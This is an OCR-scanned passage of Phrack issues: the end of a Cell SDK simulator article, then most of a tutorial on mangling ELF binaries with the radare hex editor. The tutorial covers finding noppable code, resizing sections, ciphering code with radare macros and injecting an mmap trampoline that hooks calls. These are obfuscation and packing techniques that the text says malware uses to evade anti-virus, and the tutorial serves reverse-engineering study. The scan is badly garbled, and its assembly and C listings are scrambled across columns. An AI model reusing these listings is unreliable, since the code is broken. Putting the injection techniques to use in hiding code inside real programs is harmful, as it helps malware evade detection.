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To install 


To start t 


../run_gui 


To copy fi 


ca 


Then giv 


Notes on SDK/Simulator Environment 


[There is some pictures on the simulator and sdk running on the attached file: 
images/cell-siml.jpg and images/cell-sim2. jpg 


the SDK/Simulator, do: 

Download the Cell SDK ISO image from the IBM alphaWorks website. 
Mount the disk image on the mount directory: mount -o loop 
CellSDK<version>.iso /mnt/phrack 
Change directory to /mnt/phrack/software: 

Install the SDK by using the following command and answer any 
prompts: ./cellsdk install 


he simulator: cd /opt/IBM/systemsim—-cell/run/cell/linux 
Click on the ’go’ button to start the simulated system 


les to the simulated system (inside it run): 
llthru source /home/bsdaemon/Phrack/hello_ppu > hello_ppu 


the correct permissions and execute: 


lic.pdf 


lic.pdf 


lic.pdf 
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chmod +x hello_ppu 
./hello_ppu 


------ [ 8 — Sources [cell_samples.tgz] 


Attached all the samples used on this article to be compiled in a Linux 
running on Cell machine. 


Further updates will be available in the RISE Security website at: 
http://www.risesecurity.org 


For the author’s public key: 
http://www.kernelhacking.com/rodrigo/docs/public.txt 
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==Phrack Inc.== 


Volume Ox0d, Issue 0x42, Phile #0x0E of Oxl1l 


[ manual binary mangling with radare ] 


[ by pancake <at> nopcode.org> ] 
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--[ 1 - Introduction 
Revers ngineering is something usually related to w32 environments where 


there is lot of non-free software and where the use of protections is more 
xtended to enforce valuation time periods or protect intellectual (?) 
property, using binary packing and code obfuscation techniques. 


These kind of protections are also used by viruses and worms to evade 
anti-virus engines in order to detect sandboxes. This makes reverse 
engineering a double-edged sword. 


The way to do low level analysis does usually involve the development and 
use of a lot of small specific utilities to gather information about the 
contents of firmware or a disk image to carve for keywords and dump its 
blocks. 


Actually we have a wide variety of software and hardware platforms and 
revers ngineering tools should reflect this. 


Obviously, revers ngineering, cracking and such are not only related to 
legal tasks. Crackmes, hacking challenges and learning for the heck of it 
are also good reasons to play with binaries. For us, there is a simple 
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reason behind them all: fun. 


--[ 1.1 - The framework 


At this point, we can imagine a framework that combines some of the basics 
of *nix, offering a set of actions over an abstracted IO layer. 


Following these premises I started to write a block based hexadecimal 
editor. It allows to seamlessly open a disc device, file, socket, serial 
or process. You can then both automatize processing actions by scripts and 
perform manual interactive analysis. 


The framework is composed of various small utilities that can be easily 
integrated between them by using pipes, files or an API: 


radare: the entrypoint for everything :) 

rahash: block based hashing utility 

radiff: multiple binary diffing algorithms 

rabin: extract information from binaries (ELF,MZ,CLASS,MACHO..) 


rasc: shellcode construction helper 

rasm: commandline assembler/disassembler 

rax: inline multiple base converter 

xrefs: blind search for relative code references 


The magic of radare resides in the ortogonality of commands and metadata 
which makes easy to implement automatizations. 


Radare comes with a native debugger that works on many os/arches and offers 
many interesting commands to ease the analysis of binaries without having 
the source. 


Another interesting feature is supporting high level scripting languages 
like python, ruby or lua. Thanks to a remote protocol that abstracts the 
IO, it is allowed the use of immunity debugger, IDA, gdb, bochs, vmware and 
many other debugging backends only writing a few lines of script or even 
using the remote GDB protocol. 


In this article I will introduce various topics. It is impossible to 
explain everything in a single article. 


If you want to learn more about it I recommend you to pull the latest hg 
tip and read the online documentation at: 


http://www.radare.org [0] 
I have also written a book [1] in pdf and html available at: 


http://www.radare.org/get/radare.pdf 


--[ 1.2 - First steps 


To ease the reading of the article I will first introduce the use of radare 
with some of its basics. 


Before running radare I recommend to setup the ~/.radarerc with this: 


e scr.color=1 ; enable color screen 
e file.id=1 ; identify files when opened 
e file.flag=1 ; automatically add bookmarks (flags) to syms, strings.. 
e file.analyze=1 ; perform basic code analysis 
Here’s a list of points that will help us to better understand how radare 


commands are built. 


—- each command is identified by a single letter 
— subcommands are just concatenated characters 
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—- e command stands for eval and is used to define configuration variables 
— comments are defined with a ";" char 


This command syntax offers a flexible input CLI that allows to perform 
temporal seeks, repeat commands multiple times, iterate over file flags, 
use real system pipes and much more. 


Here are som xamples of commands: 


pdf @@ sym. ; run "pdf" (print disassembled function) over all 
; flags matching "sym." 
wx cc @@.file ; write OxCC at every offset specified in file 


script ; interpret file as radare commands 

b 128 ; set block size to 128 bytes 
b 1M ; any math expression is valid here (hex, dec, flags, ..) 
x @ eip ; dump "block size" bytes (s b command) at eip 
pad | grep call ; disassemble blocksize bytes and pipe to system’s grep 
pd call ; same as previous but using internal grep 
pd~call[0] ; get column 0 (offset) after grepping calls in disasm 
3! step ; run 3 steps (system is handled by the wrapped I0) 
'!lls ; run system command 
f£* > flags.txt ; dump all flags as radare commands into a file 

--[ 1.3 - Base conversions 


rax is an utility that converts values between bases. Given an hexadecimal 
value it returns the decimal conversion and viceversa. 


It is also possible to convert raw streams or hexpair strings into 
printable C-like strings using the -s parameter: 


S$ rax -h 
Usage: rax [-] | [-s] [-e] [int|Ox|Fx|.f].o] [...] 
int -> hex ; rax 10 
hex -> int ; vax Oxa 
-int -> hex ; vax -77 
-hex -> int ; vax Oxffffffb3 
float -> hex 2 Wax 3.33£ 
hex —-> float ; vax Fx4055led8 
oct -—> hex ; vax 035 
hex -> oct ; vax Oxl2 (O is a letter) 
bin —> hex ; vrax 1100011b 
hex —-> bin ; Yrax Bx63 
-e swap endianness ; vax -e 0x33 
-s swap hex to bin ; tax -—s 43: 4a. 50 


= read data from stdin until eof 
With it we can convert a raw file into a list of hexpairs: 
§ cat /bin/true | rax - 


There is an inverse operation for every input format, so we can do 
things like this: 


S cat /bin/true | rax - | rax -s - > /tmp/true 
S$ md5sum /bin/true /tmp/true 
20c1598b2f8a9dc44c07de2f21bec5a6 /bin/true 
20c1598b2f8a9dc44c07de2f21bcec5a6 /tmp/true 


rax(l) can be also used in interactive mode by reading lines from stdin. 


--[ 1.4 - The target 


This article aims to explain some practical cases where an scriptable 
hexadecimal editor can trivially solve and provide new perspectives to 
solve revers ngineering quests. 
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We will take a x86 [2] GNU/Linux ELF [3] binary as a main target. Radare 
supports many architectures (ppc, arm, mips, java, msil..) and operating 
systems (osx, gnu/ linux, solaris, w32, wine, bsd), You should take in mind 
that commands and debugger features explained in this article can be 
applied to any other platform than gnu/linux-x86. 


In this article we will focus on the most widely-known platform 
(gnu/linux-x86) to ease the reading. 


Our victim will suffer various manipulation stages to make reverse 
engineering harder keeping functionality intact. 


The assembly snippets are written in AT&T syntax [4], which I think it’s 
more coherent than Intel so you will have to use GAS, which is a nice multi 
architecture assembler. 


Radare2 has a full API with pluggable backends to assemble and disassemble 
for many architectures supporting labels and some basic assembler 
directives. This is done in ’rasm2’ which is a reimplementation of rasm 
using libr. 


However, this article covers the more stable radarel and will only use the 
‘'rasm’ command to assemble simple instructions instead of complete 
snippets. 


The article exposes multiple situations where low level analysis and 
metadata processing will help us to transform part of the program or simply 
obtain information from a binary blob. 


Usually the best program to start learning radare is the GNU ’true’, which 
can be completely replaced with two asm instructions, leaving the rest of 
the code to play with. However it is not a valid target for this article, 
because we are interested in looking for complex constructions to hide 
control flow with call trampolines, checksumming artifacts, ciphered code, 
relocations, syscall obfuscation, etc. 


--[ 2 - Injecting code in ELF 


The first question that pops up in our minds is: How the hell we will add 
more code in an already compiled program? 


What real packers do is to load the entire program structures in memory for 
in-memory manipulation, handling all the code relocations and generating a 
completely brand new executable. 


Program transformation is not an easy task. It requires a complete analysis 
which sometimes is impossible to do automatically, due to the need to mix 
the results of static, dynamic and manual code analysis. 


Instead of this approach, we will do it in a bottom to top way, taking low 
level code structures as units and doing transformations without the need 
to understand the whole program. 


This enables ensuring that transformations won’t break the program in any 
way because their local and internal dependencies will be easy identified. 


Because the target program is generated by a compiler we can make some 
assumptions. For instance, there will be a place to inject code, the 
functions will be sequentially defined, access to variables will be 
easier to track and calling conventions will be the same along all the 
program. 


Our first action will be to find and identify all the parts of the text 
section with unused or noppable code. 


‘noppable’ code is defined as code that is never executed, or that can be 
replaced by a smaller implementation, taking benefit of the non-overwritten 
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tes. 
mpiler-related stubs can be sometimes noppable or replaced, and more of 


is is found in non-C native-compiled programs (haskell, Ctt, ...) 


spaces between functions where no code is executed are called ’function 
ddings’. They exist because the compiler tried to optimize the position 
the functions at aligned addresses to ease to job on the cpu. 


me other compiler-related optimizations will inline the same piece of 
de multiple times. By identifying such patterns, we can patch the 
aghetti code into a single loop with an end branch and use the rest for 
r own purposes. 


llowing paragraphs will verbosely explain those situations. 


N 


In 


ver executed cod 


We can find this code by doing many execution traces of the program and 
finding the uncovered ranges. This option will probably require human 
interaction. 


Using static code analysis we would not be able to follow runtime pointer 
calculations or call tables. Therefore, this method will also require some 
human interaction and, in th vent we get to identify a pattern, we can 
write a script to automatize this task and add N code xrefs from a single 
source address. 


We can also emulate some parts to resolve register values before reaching 
a register based call/branch instruction. 


lined code and unrolled loops: 


Programmers and compilers usually prefer to inline (duplicate the code of 
a external function in the middle of another one) to reduce th xecution 
cost of a ’call’ instruction. 


Loops are also unrolled and this produces longer, but more optimal code 
because the cpu doesn’t need to compute unnecessary branches all the 
time. 


These are common speedup practices, and they are a good target to place 
our code. This process is done in four steps: 


—- Find/identify inline code or unrolled loops (repeated similar blocks) 
—- Patch to uninline or re-roll the loop 


-— Profit! 


Radare provides different commands to help to find/identify such kind of 
code blocks. The related commands are not going to do all the job 
automatically. They require some automatization, scripting or manual 
interaction. 


The basic approach to identify such kind of code is by finding repeated 
sequences of bytes allowing a percentage of similarity. Most inline code 
will come from small functions and unrolled loops will be probably small 
too. 

There are two basic search commands that can help on this: 


[OxB7F13810]> /? 


/p len ; search pattern of length ’len’ 
/P count ; search patterns of size $$b matching at >N bytes of curblock 


The first command (/p) will find repeated bytes of a specified length. 
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[The other one (/P) will find a block that matches at least N bytes of the 
current blocksize compared to the current on 


[These pattern search must be restricted to certain ranges, like the .text 
section or the function boundaries: 


[The search should be restricted to the text section: 
> e search.from = section._text 
> e search.to = section._text_end 


All search commands (/) can be configured by the ’search.’ eval 
variables. 


The ’section.’ flag names are defined by ‘rabin’. Calling rabin with 
the -r flag will dump the binary information to stdout as radare commands. 


This is done at radare startup when file.id and file.flag are enabled, 
but this information can be reimported from the shell by calling: 


> .!!rabin -rS S${FIL 


Gl 


} 


This command can be understood as a dot command ’.’, which interprets the 
output of the following command ’!’ as radare commands. In the example 
below there are two admiration marks (!!). This is because the single ’!’ 
will run the command through the io subsystem of radare, falling in the 
debugger layer if trying to run a program in the shell which has a name 
that equals a debugger command’s. 


The double ’!!'’ is used to directly escape from the io subsystem and run 
the program directly in the system. 


This command can be used to externalize some scripting facilities by 
running other programs, processing data, and feeding radare’s core back 
with dynamically generated commands. 


Once all the inlined code is identified, search hits should be analyzed, 
discarding false positives and making all those blocks work as subroutines 
using a call/ret pattern, nopping the rest of the bytes. Unused bytes can 
now be filled with any code. 


Another way to identify inlined code can be done by splitting a function 
code analysis into basic blocks without splitting nodes (e 
graph.split=false) and finding similar basic blocks or repeated. 


Unrolled loops are based on repeated sequences of code with small 
variations based on the iterator variable which must change along the 
repeated blocks in a progressive way (incremental, decremental, etc). 


Language bindings are recommended for implementing such kind of tasks, 

not only because the higher language representation, but also thanks to 
the high level APIs for code analysis that are distributed with radare 

for python and other scripting languages (perl, ruby, lua). 


The ’/’ command is used to perform searches. A radare command can be 
defined to b xecuted every time a hit is found, or we can later use 
t 
, 


he ’@@’ foreach iterator can be used over all the flags prefixed with 
hitO’ later. 


See '/?'’ for help on search-related commands but, in short, there are 
commands to search in plain text, hexadecimal, apply binary masks to 
keywords, launch multiple keywords at a time, define keywords in a file, 
searchtreplace, and more. 


One of the search algorithms accessible through the ’/’ command is called 
'/p', which performs a pattern search. The command accepts a numeric value 
which determines the minimum size for a pattern to be resolved. 


Patterns are identified by a series of consecutive bytes, with a minimum 
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length, that appear more than once. The output will return a pattern id, 
the pattern bytes and a list of offsets where the pattern is found. 


This kind of search algorithm can be useful for analyzing huge binary 
files like firmwares, disc images or uncompressed pictures. 


In order to get a global overview of a big file the ’pO’ command can be 
used, which will display the full file represented in ’blocksize’ bytes 
in hexadecimal. Each byte will represent the number of printable 
characters in the block, the entropy calculation, the number of 
functions identified there, the number of executed opcodes, or whatever 
is set at the ’zoom.byte’ eval variable. 


zoom view real file 
| O | 0 
| aay ieaer ees 
| 2 | Pi 
| 3 | re, 128 (filesize/blocksize) 
| | 


The number of bytes of the real file represented in a byte of the 
zoom view is the quotient between the filesize and the blocksize. 


Function padding and preludes: 


Compilers usually pad functions with nop instructions to align the 
following one. They are usually small, but sometimes they are big enough 
to store trampolines that will help obfuscate the execution flow. 


In the ’extending trampolines’ chapter I will explain a technique to hide 
function preludes inside a ’call trampoline’ which runs the initial code 
of each function and then jumps back to the next instruction. 


By using call tables loaded in .data or memory it will be harder to follow 
for the reverser, because the program can lose all function preludes and 
footers so that it’1ll be read as a single blob. 


Compiler stubs: 


Function preludes and calling conventions can be used as watermarks to 
identify the compiler used. But when compiler optimizations are enabled 
the generated code will be heavily transformed and those preludes will 
probably be lost. 


Some new versions of gcc are using a new function prelude aligning the 
stack before entering the code to make memory access by the cpu on local 
variables. But we can replace them with a shorter hand made one adapted 
to the concrete function needs and this way ripping some more bytes for 
our own fun. 

The entrypoint embeds a system dependent loader that acts as a launcher 
for the constructor/main/destructor. We can analyze the constructor and 
the destructor to check if they are void. 


Then, we can drop all this code by just adding a branch to the main 
pointer, getting about 190 bytes for a C program. You will probably find 
much more unused code in programs written in D, Ct+, haskell or any other 
high level language. 


This is how a common gcc’s entrypoint looks like: 


0x08049a00, / xor ebp, ebp 
0x08049a02 | pop esi 
0x08049a03 | mov ecx, esp 
0x08049a05 | and esp, Oxf0 
0x08049a08, | push eax 
0x08049a09 | push esp 
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0x08049a0a push edx 
0x08049a0b push dword 0x805b630 ; sym. fini 
0x08049al10, push dword 0x805b640 ; sym.init 


0x08049a15 push ecx 
0x08049al16 push esi 
0x08049a17 push dword 0x804f4e0 ; sym.main 


0x08049alc, call 0x80495b4 ; 1 = imp.__libc_start_main 
0x08049a21 \ hlt 


By pushing 0’s instead of fini/init pointers we can ignore the 
constructor and destructor functions of the program, most of the programs 
will work with no problems without them. 


By analyzing code in both (sym.init and sym.fini) pointers we can 
determine the number of bytes: 


[0x080482C0O]> af @ sym.__libc_csu_fini”~size 
size = 4 
[O0x080482C0O]> af @ sym.__libc_csu_init” size 
size = 89 

Tracing 


Execution traces are wonderful utilities to easily cleanup the view 
of a binary by identifying parts of it as tasks or areas. We can for 
example make a fast identification of the GUI code by starting a 
trace and graphically clicking on all the menus and visual options 
of the target application. 


The most common problem to tracing is the low performance of a !stepall 
operation, which mainly gets stupidly slow on loops, reps and tracing 
already traced code blocks. To speedup this process, radare implements 

a "touchtrace" method (available under the !tt command) which implements 
an idea of MrGadix (thanks!) 


This method consist in keeping a swapped copy of the targeted process 
memory space on the debugger side and replacing it with 
software breakpoint instructions. On intel we would use CC (aka int3). 


Once the program runs, it raises an exception because of the trap 
instruction, which is handled by the debugger. Then the debugger checks 
if the instruction at %teip has been swapped and replaces the userspac 
one, storing information about this step (like timestamp, number of times 
it has been executed and step counter). 


Once the instruction has been replaced, the debugger instructs the 
process to continue execution. Each time an unswapped instruction is 
xecuted the debugger replaces it. 


At the end (giving an end-breakpoint) the debugger have a buffer with 
enough information to determine th xecuted ranges. Using this easy 
method we can easily skip all the reps, loops and already analyzed 
code blocks, speeding up the binary analysis. 


Using the "at" command (which stands for analyze traces) it is possible 
to take statistics or information about the traces and, for example.. 
serialize the program and unroll loops. 


We can also use !trace, giving a certain debug level as numeric argument, 
to log register changes, executed instructions, buffers, stack changes, 
etc.. 


After these steps we can subtract the resulting ranges against the .text 
section and get how many bytes we can use to inject code. 


If the resulting space is not enough for our purposes we will have to face 
section resizing to put our code. This is explained later. 
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Radare offers the "ar" (analyze ranges) command to manage range lists. 
It can perform addition, subtraction and boolean operations. 


> ar+ 0x1000 0x1040 ; manual range addition 
> ar+ 0x1020 0x1080 ; manual add with overlap 
> ari ; import traces from other places 


> .atr* ; import execution traces information 

> .CF* |; import function ranges 

> .gr* ; import code analysis graph ranges 

> ar ; display non overlapped ranges 

> ; show booleaned ranges inside text section 
> arb section._text section._text_end 


We can also import range information from external files or programs. One 
of the nicer characteristics of *nix is the ability to communicate 
applications using pipes by just making one program /talk’ in the other 


program language. So if we write a perl script that parses an IDA database 
(or IDC), we can extract the information we need and print radare commands 


(’ar’ in this case) to stdout, and then parsing the results with the ’.’ 
command. 


This time ar gives us information about the number of bytes that are 
theoretically not going to be executed and its ranges. 


We can now place some breakpoints on these locations to ensure we are not 
missing anything. Manual revision of the automated code analysis and 
tracing results is recommended. 


--[ 2.1 - Resolving register based branchs 


The ’av’ command provides subcommands to analyze opcodes inside 
the native virtual machine. 


, 


he basic commands are: ’av-’ to restart the vm state, ’avr’ to manage 


e 
instructions from the current seek (will set the eip VM register to the 
offset value). 


H 


nternally, the virtual machine engine translates instructions into 


This simple concept allows to easily implement support for new 
nstructions or architectures. 


B- 


Here is an example. The code analysis has reached a call instruction 
addressing with a register. The code looks like: 


[* --- */ 

S$ cat callreg.s 
-global main 
-data 

-long foo 

-text 


foo: 
ret 

main: 
xor %eax, %eax 
mov $foo, %ebx 
add %eax, %Sebx 
call *%ebx 
ret 


S$ gcc callreg.s 
S$ radare -d ./a.out 


egisters, ‘’ave’ to evaluate VM expressions and ‘’avx’ that will execute N 


evaluable strings that are used to manipulate memory and change registers. 
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> !cont sym.main 
Continue until (sym.main) = 0x08048375 
[0x08048375]> pd 5 @ sym.main 
0x08048375 eip,sym.main: 
0x08048375 / xor eax, eax 
0x08048377 mov ebx, 0x8048374 ; sym.foo 
0x0804837c, add ebx, eax 
0x0804837e call ebx 
0x08048380, \ ret 
[0x08048375]> avx 4 
Emulating 4 opcodes 
MMU: cached 
Importing register values 
0x08048375 eax *= eax 
; eax “= eax 
0x08048377 ebx = 0x8048374 ; sym.foo 
; ebx = 0x8048374 
0x0804837c, ebx += eax 
; ebx += eax 
0x0804837e call ebx 
; esp=esp-4 
; [Lesp]=eipt2 
;==> [Oxbf9be388] = 8048382 ((esp])) 
; write 8048382 @ Oxbf9be388 


; elp=ebx 


[0x08048375]> avr eip 


eip = 0x08048374 


At this point we can continue the code analysis where the ‘eip’ 


register of the virtual 


machine points. 


[0Ox08048375]> .afr @ 


--[ 


There is no simple way 


‘avr eip™ [2] * 


2.2 - Resizing data section 


to resize a section in radarel. 


completely manual and tricky. 


In order to solve this 


limitation, 


(named libr) 


that reimp] 


This process is 


radare2 provides a set of libraries 
lement all the functionalities of radare 1.x 


following a modular design instead of the old monolithic approach. 


Both branches of development ar 


Here is where radare2 api 


S$ cat rs.c 
include <stdio.h> 
include <r_bin.h> 


int main(int argc, 


struct r_bin_t bin; 


if (arge != 4) { 
printf ("Usage: %s <ELF file> <section> <size>\n", argv[0]); 
} else { 
r_bin_init (&bin); 
if (!r_bin_open(&bin, argv[1], 1, NULL)) { 
fprintf(stderr, "Cannot open ’%s’.\n", argv[1]); 
} else 
if (!r_bin_resize_section(&bin, argv[2], r_num_math (NULL, argv[3]))) 
fprintf(stderr, "Cannot resize section.\n"); 
} else { 


(libr) comes in action: 


char *argv[]) 


r_bin_close (&bin) ; 


being done in parallel. 


{ 
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return 0; 
} 
} 


return 1; 


S$ gcc -I/usr/include/libr -lr_bin rs.c -o rs 


S$ rabin -S my-target-elf | grep .data 
idx=24 address=0x0805d0c0 offset=0x000150c0 size=00000484 \ 
align=0x00000020 privileges=-rw- name=.data 


S$ ./rs my-target-elf .data 0x9400 


S rabin -S my-target-elf | grep .data 
idx=24 address=0x0805d0c0 offset=0x000150c0 size=00009400 \ 
align=0x00000020 privileges=-rw- name=.data 


Our 'rs’ program will open a binary file (ELF 32/64, PE32/32+, ...) it will 
resolve a section named ’.data’ to change its size and will shift the rest 


of sections to keep the elf information as is. 
The reason for resizing the .data section is because this one is commonly 
linked after the text section. There will be no need to reanalyze the 
program code to rebase all the data accesses to the new address. 


The target program should keep working after the section resizing and we 
already know which places in the program can be used to inject our 
trampoline. 


-text -text 
<-- inject trampoline 


.data .data 


< inject new code or data 


Next chapters will explain multiple trampoline methods that will use our 
resized data section to store pointer tables or new code. 


--[ 2.3 - Basics on code injection 


Self modifying code is a nice thing, but usually a dangerous task too. Also 


patches/tools like SElinux will not let us to write to an already 
executable section. 


To avoid this problem we can change in the ELF headers the .text perms to 
writable but not executable, and include our decryption function in a new 
executable section. When the decryption process is done, it will have to 
change text perms to executable and then transfer control to it. 


In order to add multiple nested encryption layers the task will be harder 
mostly because of the relocation problems, and if the program is not 
PIC-ed, rebasing an entire application on the fly by allocating and copying 
the program multiple times in memory can be quite complicated. 


The simplest implementation consists in these steps: 


— Define from/to ranges 

Define cipher key and algorithm 

Inject deciphering code in the entrypoint 

— We will need to use mprotect before looping 
- Statically cipher the section 


The from/to addresses can be hardcoded in the assembly snippet or written 
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in .data or somewhere for later. We can also ask the user for a key and 


make the binary work only with a password. 


If the encryption key is not found in the binary, the unpacking process 
becomes harder, and we will have to implement a dynamic method to find the 
correct one. This will be explained later. 


Another way to define ranges is by using watermarks and let our injected 
code walk over the memory looking for these marks. 


The last step is probably th asier one. We already know the key and the 
algorithm, its time to rewrite the inverse one using radare commands and 
let the script run over these ranges. 


This is an example: 


, 


The ’wo’ command is a subcommand of the ‘’w’ (write) which offers arithmetic 


write operations over the current block. 


[0x00000000)]> wo? 

Usage: wo[xrlasmd] [hexpairs] 

Example: wox 90 ; xor cur block with 90 

Example: woa 02 03 ; add 2, 3 to all bytes of cur block 
Supported operations: 


woa addition += 
wos subtraction —= 
wom multiply aS 
wod divide /= 
wox xor A= 
woo or |= 
woA and &= 
wor shift right >>= 
wol shift left <<= 


It uses cyclic hexpair byte arrays as arguments. Just by seeking on the 
"from" address and setting blocksize as "to-from" we will be ready to type 
the ’wo’ ones. 


Implementing this process in macros will make the code more maintainable 
and easy to manage. The understanding of functional programming is good 
for writing radare macros, split the code in small functions doing 
minimal tasks and make them interact with each other. 


Macros are defined like in lisp, but syntax is really closer to a mix 
between perl and brainfuck. Don’t get scary at first instance..it doesn’t 
hurt as much as you can think and the resulting code is funnier than 
expected ;) 


(cipher from to key 
s $0 
b $1-$0 
woa $2 
wox $2) 


We can put it in a single line (by replacing newlines with commas ’,’) 
and put it in our ~/.radarerc: 


(cipher from to key,s $0,b $1-S0,woa $2,wox $2,) 


Now we can call this macro at any time by just prepending a dot before the 
parenthesis and feeding it with the arguments. 


f from @ 0x1200 
£f to @ 0x9000 
. (cipher from to 2970) 


To ease the code injection we can write a macro like this: 
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(inject hookaddr file addr 
wa call $2 @ $0 
wf $1 @ $2) 


Feeding this macro with the proper values will assemble a call opcode 
branching to the place where we inject our code (addr or $2) stored in the 
Sie or SL . 


Radare has the expanded AES key searching algorithm developed by Victor 
Mu~noz. It can be helpful while reversing a program that uses this kind of 
ciphering algorithm. As the IO is abstracted it is possible to launch this 
search against files, program memory, ram dumps, etc.. 


For example: 


S radare -u /dev/mem 
[Ox00000000]> /a 


WARNING: Most current GNU/Linux distributions comes with the kernel 
compiled with the CONFIG_STRICT_DEVMEM option which restricts the access 
of /dev/mem to the only first 1.1M. 


All write operations are stored in a linked list of backups with the 
removed contents. This make possible to undo and redo all changes done 
directly on file. This allows you to try different modifications on the 
binary without having to restore manually the original one. 


These changes can be diffed later with the "radiff -r" command. The command 
performs a deltified binary diff between two files, The ’-r’ displays the 
result of the operation as radare commands that transforming the first 
binary into the second one. 


The output can be piped to a file and used later from radare to patch it 
at runtime or statically. 


For example: 
S$ cp /bin/true true 


S$ radare -w true 
[OxO08048AE0]> wa xor eax,eax;inc eax;xor ebx,ebx;int 0x80 @ entrypoint 


[Ox08048AEF0]> u 

03 + 2 00000ae0: 31 ed => 31 c0 
02 + 1 00000ae2: 5e => 40 

01 + 2 00000ae3: 89 el => 31 db 
00 + 2 00000ae5: 83 e4 => cd 80 


[Ox08048AE0]> u* | tee true.patch 
wx 31 cO @ 0x00000ae0 

wx 40 @ 0x00000ae2 

wx 31 db @ 0x00000ae3 

wx cd 80 @ 0x00000ae5 


The ’u’ command is used to ‘undo’ write operations. Appending the ’*’ we 
force the ’u’ command to list the write changes as radare commands, and we 
pipe the output to the ’tee’ unix program. 


Let’s generate the diff: 


S radiff -r /bin/true true 
e file.insertblock=false 
file.insert=fals 
wx cO @ Oxael 
wx 40 @ Oxae2 
wx 31 @ Oxae3 
wx db @ Oxae4 
@ Oxae5 
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wx 80 @ Oxae6é 


This output can be piped into radare through stdin or using the ’.’ 
command to interpret the contents of a file or the output of a command. 


[Ox08048AE0]> . radiff.patch 
or 
[OxO08048AEF0]> .!!radiff -r /bin/true $FIL 


eal 


The ’SFILE’ environment is exported to the shell from inside radare as well 
as other variables like SBLOCK, S$BYTES, SENDIAN, SSIZE, S$ARCH, $BADDR, 


Note that in radare there’s not really much difference between memory 
addresses and on-disk ones because the virtual addresses ar mulated by 
the IO layer thanks to the io.vaddr and io.paddr variables which are used 
to define the virtual and physical addresses for a section or for the whole 
file. 


The ’S’ command is used to configure a fine-grained setup of virtual and 
physical addressing rules for ranged sections of offsets. 


Do not care too much about it because ’rabin’ will configure these 
variables at startup when the file.id eval variable is true. 


--[ 2.4 - Mmap trampoline 


} 


[The problem faced when resizing the .text section is that .data section is 
shifted, and the program will try to access it absolutely or relatively. 


This situation forces us to rebase all the text section and adapt the rest of 
sections. 


The problem is that we need a deep code analysis to rebase and this is 
something that we will probably do wrong if we try to do only a static code 
analysis. This situation usually require a complex dynamic, and sometimes 
manual, analysis to fix all the possible pointers. 


[To skip this issue we can just resize the .data section which is after the 
.text one and just write a trampoline in the .text section loading code 
from .data and putting it in memory using mmap. 

The decision to use mmap is because is the only way to get executable pages 
with write permissions in memory even with SELinux enabled. 


The C code looks like this: 


8< 


include <stdio.h> 
include <string.h> 
include <sys/mman.h> 


int run_code(const char *buf, int len) 


unsigned char *ptr; 

int (*fun) (); 

ptr = mmap(NULL, len, 
PROT_EXEC | PROT_READ | PROT_WRITE, 
MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); 


if (ptr == NULL) 
return -1; 
fun = (int (*) (void))ptr; 


memcpy (ptr, buf, len); 
mprotect (ptr, len, PROT_READ | PROT_EXEC); 
return fun(); 


} 


int main () 
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unsigned char trap = 


return run_code(&trap, 


} 


Oxcc; 
1); 


8< 


The manual rewrite in assembly become: 


-global 


8< 
main 


-global 
-data 


retaddr: 


shellcode: 


hello: 


-text 


run_code 


-long 0 
-byte Oxcc 


tailcall: 


push %ebp 

mov %sesp, %sebp 
push Shello 
call printf 
addl $4, %esp 
pop %Sebp 

ret 


run_code: 


main: 


(retaddr) 
lcall *0O */ 
1 tailcall 
(retaddr) 


pop 
/* 

cal 
push 


/* our snippet */ 


pus 
mov 
pus 


h sebp 
SESP, 
ha 


Sebp 


h %ebp 

sebp, %sebp 
S-1, %edi 
S$Ox22, %esi 
S7, %edax 
$4096, %ecx 
Sebx, Sebx 
$192, %eax 
$0x80 

Sebp 


Seax, sedi 
Ox8 (Sebp), 
$128, %ecx 


movsb 
Seax, sedi 
$5, %edx 
$4096, %ecx 
Sedi, %ebx 
$125, %eax 
S0x80 


call *%Sedi 


popa 
pop %Sebp 
ret 


/* 
/* 
/* 
/* 
/* 
/* 
/* 


Sesi 


/* 
/* 
/* 
/* 


.string "Hello World\n" 


Oxe/ 

=] * / 
MAP_ANONYMOUS 
PROT_EXEC | 
len = 4096 */ 
On 

mmap2 */ 


MAE 
PROT_R 


p 
BA 


/* dest pointer */ 


/* get buf 


R-X */ 
len */ 
addr */ 
mprotect */ 


(arg0) 


PRIVATE 
D | 


a 
PROT_WRITI 


Af 


Gl 


ae 
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push Sshellcode 
call run_code 
add $4, %esp 
ret 


8< 


Running this little program will result on a trap instruction executed on the 
mmaped area. I decided to do not checks on return values to make the code 
smaller. 


S$ gce re.s 

S$ ./a.out 

Hello World 
Trace/breakpoint trap 


The size in bytes of this code can be measured with this line in the shell: 


S$ echo $((‘rabin -o d/s a.out |grep run_code|cut -d ’ '’ -f 2 |we -c*/2)) 
76 


This graph explains the layout of the patch required 


/ push dword csu_fini 
2 EP < push dword csu_init 
| \ push dword main 


V Vv 
csu_init main / push 0x80483490 
cana am ar | rae < call getopt 
mmap = sues \ mov [esp+30], eax 
trampoline | 
| : : 
Il’ 11 | | this code needs | 
| | | . < the mmap tramp | 
pon pane | to be executed | 
/ hook \ ---> mmap code a “ : 
\getopt/ . 
| 4 
| 
/ fall to the getopt flow 
getopt <----- f 
| 
(ret) 


The injection process consists on the following steps: 
* Resize the .data section to get enought space for our code 


f newsize @ section._data_end - section._data + 4096 


= 


'rabin2 -o r/.data/‘?v newsize* SFILE 
q! 


* Write the code at the end of the unresized .data section 
!!gcc our-code.c 
"!!lrabin a.out -o d/s a.out | grep “main | cut -d ’ ’ -f 2 > inj.bytes" 
WF inj.bytes @ section._data_end 
* Null the __libc_csu_init pointer at entrypoint (2nd push dword) 
e asm.profile=simple 
s entrypoint 


wa push 0 @ ‘pd 20°push dword[0]#1°* 


* Inject the mmap loader at symbol __libc_csu_init 
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generate mmap.bytes with the mmap trampoline 

!!gcc mmap-tramp.sS 

"l!lrabin a.out -o d/s a.out | grep “main | cut -d ’ ’ -f 2 > mmap.bytes" 
write hexpair bytes contained in mmap.bytes file at csu_init 

wF mmap.bytes @ sym.__libc_csu_init 


* Hook a call instruction to bridge the execution of our injected code 
and continue the original call workflow. 


Determine the address of the call to the target symbol to be hooked. 
For example. Having ’ping’ program, this script will determine an 
xref to the getopt import PLT entry. 


s entrypoint 
seek to the third push dword in the entry point (main) 
s ‘pd 207°push dword[3] #2 * 


Analyze function: the ’.’ will interpret the output of the command 
‘af*’ that prints radare commands registering xrefs, variable 
accesses, stack frame changes, etc. 

.af* 


generate a file named ’xrefs’ containing the code references 
to the getopt symbol. 
Cx” ‘?v imp.getopt*[1] > xrefs 


